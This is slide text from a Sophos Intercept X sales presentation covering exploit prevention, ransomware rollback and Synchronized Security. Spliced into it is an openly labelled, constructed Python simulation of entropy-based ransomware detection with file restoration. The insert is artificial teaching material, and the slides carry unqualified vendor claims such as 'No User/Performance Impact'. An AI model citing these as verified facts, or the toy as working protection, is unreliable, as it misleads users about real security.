Exposure Prevention: URL Blocking, Web/App/Dev Ctrl, Download Rep
Pre-Exec Analytics: Generic Matching, Heuristics, Core Rules
File Scanning: Known Malware, Malware Bits
Run-Time Behavior Analytics: Runtime Behavior
Exploit Detection: Technique Identification
Page 57
Introducing
Page 58
Introducing Sophos Intercept X
ADVANCED MALWARE | ZERO DAY EXPLOITS | LIMITED VISIBILITY
Anti-Exploit: Prevent Exploit Techniques
• Signatureless Exploit Prevention
• Protects Patient-Zero / Zero-Day
• Blocks Memory-Resident Attacks
• Tiny Footprint & Low False Positives
No User/Performance Impact | No File Scanning | No Signatures
Root-Cause Analysis: Automated Incident Response
• IT Friendly Incident Response
• Process Threat Chain Visualization
• Prescriptive Remediation Guidance
• Advanced Malware Clean
Faster Incident Response | Root-Cause Visualization | Forensic Strength Clean
Anti-Ransomware: Detect Next-Gen Threats
• Stops Malicious Encryption
• Behavior Based Conviction
• Automatically Reverts Affected Files
• Identifies source of Attack
Prevent Ransomware Attacks | Roll-Back Changes | Attack Chain Analysis
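The Anti-Ransomware bullets above (behavior based conviction, automatic reversion of affected files, identifying the source) describe a defensive pattern without showing its mechanics. The following is an added illustration written for this transcript, not Sophos code and not a description of how Intercept X or CryptoGuard is implemented internally. It assumes a simple model: keep a copy of each file just before a process first modifies it, score the process on how many distinct readable files it turns into ciphertext-like (high-entropy) data, and once that count crosses a threshold, block the process and restore everything it touched. The entropy cut-off, the conviction threshold, the event stream, the file contents and the seeded "ciphertext" are all constructed assumptions.

```python
"""Behaviour-based ransomware conviction with rollback (added illustration, not vendor code).

Model: snapshot a file before a pid first writes it; count distinct files that the pid
turns from readable into ciphertext-like data; convict when the count reaches a threshold,
block the pid and restore its files from the snapshots. Everything below is in-memory,
constructed sample data; nothing touches the real filesystem.
"""
import math
import random
from collections import defaultdict
from dataclasses import dataclass

ENTROPY_THRESHOLD = 7.0   # bits/byte: English text is ~4-5, ciphertext close to 8 (assumed cut-off)
CONVICT_AFTER = 3         # distinct files turned into ciphertext before conviction (assumed)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


@dataclass
class WriteEvent:
    pid: int      # process performing the write
    path: str     # file being (over)written
    data: bytes   # full new content


class RansomwareGuard:
    """Per-process behaviour scoring with pre-write snapshots for rollback."""

    def __init__(self, files: dict):
        self.files = dict(files)               # simulated filesystem: path -> current bytes
        self.snapshots = defaultdict(dict)     # pid -> {path: content before that pid first touched it}
        self.encrypted_by = defaultdict(set)   # pid -> paths it turned from readable into ciphertext-like
        self.blocked = set()                   # convicted pids
        self.restored = defaultdict(list)      # pid -> paths rolled back after conviction

    def on_write(self, ev: WriteEvent) -> str:
        """Apply one write event; returns 'applied', 'blocked' or 'convicted'."""
        if ev.pid in self.blocked:
            return "blocked"                   # a convicted process gets no further writes
        old = self.files.get(ev.path)
        if old is not None and ev.path not in self.snapshots[ev.pid]:
            self.snapshots[ev.pid][ev.path] = old   # keep the pre-modification copy
        self.files[ev.path] = ev.data
        # conviction signal: a readable file becomes ciphertext-like under this pid
        if (old is not None and shannon_entropy(old) < ENTROPY_THRESHOLD
                and shannon_entropy(ev.data) >= ENTROPY_THRESHOLD):
            self.encrypted_by[ev.pid].add(ev.path)
        if len(self.encrypted_by[ev.pid]) >= CONVICT_AFTER:
            self._convict(ev.pid)
            return "convicted"
        return "applied"

    def _convict(self, pid: int) -> None:
        """Block the process and revert every file it modified from the snapshots."""
        self.blocked.add(pid)
        for path, original in self.snapshots[pid].items():
            self.files[path] = original
            self.restored[pid].append(path)

    def report(self) -> dict:
        """Incident summary: convicted pid (the source of the attack) -> files rolled back."""
        return {pid: sorted(self.restored[pid]) for pid in self.blocked}


# Constructed sample content: readable text has low entropy, the "ciphertext" is a seeded
# permutation of all 256 byte values (entropy exactly 8.0), standing in for encrypted output.
PLAINTEXT = b"Quarterly figures: revenue up 4%, headcount flat, renewals at 90%.\n" * 8


def ciphertext(seed: int) -> bytes:
    return bytes(random.Random(seed).sample(range(256), 256))


def run_demo() -> tuple:
    """Constructed event stream: an editor (pid 200), an archiver (pid 300), an encryptor (pid 666)."""
    files = {f"/docs/report{i}.txt": PLAINTEXT for i in range(1, 6)}
    guard = RansomwareGuard(files)
    events = [
        WriteEvent(200, "/docs/report1.txt", PLAINTEXT + b"Addendum: none.\n"),  # normal edit
        WriteEvent(300, "/docs/archive.zip", ciphertext(99)),   # new compressed file: no snapshot, no signal
        WriteEvent(666, "/docs/report2.txt", ciphertext(2)),
        WriteEvent(666, "/docs/report3.txt", ciphertext(3)),
        WriteEvent(666, "/docs/report4.txt", ciphertext(4)),    # third file: convicted, rollback
        WriteEvent(666, "/docs/report5.txt", ciphertext(5)),    # blocked, report5 never changes
    ]
    results = [guard.on_write(ev) for ev in events]
    return results, guard


if __name__ == "__main__":
    outcomes, g = run_demo()
    print(outcomes)    # ['applied', 'applied', 'applied', 'applied', 'convicted', 'blocked']
    print(g.report())  # {666: ['/docs/report2.txt', '/docs/report3.txt', '/docs/report4.txt']}
```

Two design points worth noting: the archiver writing one high-entropy file is never convicted, because a new file has no readable "before" state and a single conversion stays under the threshold; and the conviction is per process, so the report names the pid that did the damage rather than only the files affected. A real product has to deal with the cost of snapshots, processes that spawn helpers, and legitimate encryption tools, none of which this toy handles.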
Page 59
Intercepting Exploits
Exploit Prevention
• Monitors processes for attempted use of exploit techniques, e.g. buffer overflow, code injection, stack pivot and others
• Blocks when technique is attempted
• Malware is prevented from leveraging vulnerabilities
Page 60
New EndUser Agent UI | New Admin UI
Exploit Protection against Stack Attacks, Return-Oriented Programming (ROP), Heap, Error Handling Overwrites, DLL Hijacking, and more…
Page 61
Sophos Clean: Competitive Displacement. Malware Removal. Vulnerability Assessment.
Seed New Accounts
• Complementary to Competitive AV
• View what the others leave behind
• 30-Day Free License
Removes Threats
• Deep System Inspection
• Removes Malware Remnants
• Full Quarantine / Removal
• Effective Breach Remediation
On-Demand Assessment
• Identifies Risky Files / Processes
• Constantly Refreshed Database
• Provides Additional Confidence
• Command-Line Capable
Page 62
Synchronized Security
Sophos Central (In Cloud / On Prem): Admin | Self Service | Partner
Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
Cloud Intelligence
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
Sophos Labs | 24x7x365, multi-continent operation | URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules | Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
Managed products: Endpoint/Next-Gen Endpoint | Mobile | Server | Encryption | UTM/Next-Gen Firewall | Wireless | Web
Page 63
Synchronized Security: Heartbeat between Endpoint/Next-Gen Endpoint and UTM/Next-Gen Firewall (same Sophos Central / Cloud Intelligence diagram as the previous slide)
Page 64
Extending Security Heartbeat™ from Endpoint/Next-Gen Endpoint and UTM/Next-Gen Firewall to Mobile, Server, Wireless, Web and Encryption (same Sophos Central / Cloud Intelligence diagram)
Page 65
Synchronized Encryption (same Sophos Central / Cloud Intelligence diagram, with Encryption among Endpoint/Next-Gen Endpoint, Mobile, Server, UTM/Next-Gen Firewall, Wireless and Web)
Page 66
Synchronized Security (same Sophos Central / Cloud Intelligence diagram, repeated)
Page 67
Intercept X in 3 min…
https://player.vimeo.com/video/180040392?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Crypto Guard Anti Ransomware in 60 sec
https://player.vimeo.com/video/180040393?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Root Cause Analyst (RCA) in 2 minutes
https://player.vimeo.com/video/180172281?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Signature Exploit Prevention in 60 seconds